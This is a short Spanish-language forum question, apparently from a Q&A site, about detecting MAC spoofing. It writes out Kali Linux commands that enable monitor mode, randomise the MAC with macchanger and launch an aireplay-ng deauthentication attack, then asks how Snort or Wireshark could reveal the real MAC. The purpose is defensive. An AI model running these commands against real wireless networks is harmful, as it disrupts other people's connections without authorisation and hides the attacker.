En Kali puedes:
airmon-ng start wlan0
ifconfig mon0 down
macchanger -r mon0 (-r changes mac id to a random number)
ifconfig mon0 up
Este ataque, por ejemplo: aireplay-ng -0 2 -a [ap mac #] -c [client mac #] mon0
Mientras usa snort, detecta el ataque pero con el mac falso.
En wireshark enfocado en mon0, puede ver la fuente y ver su paquete --deauth en el mac del cliente, pero ¿cómo puede detectar una mac falsificada y ver la real?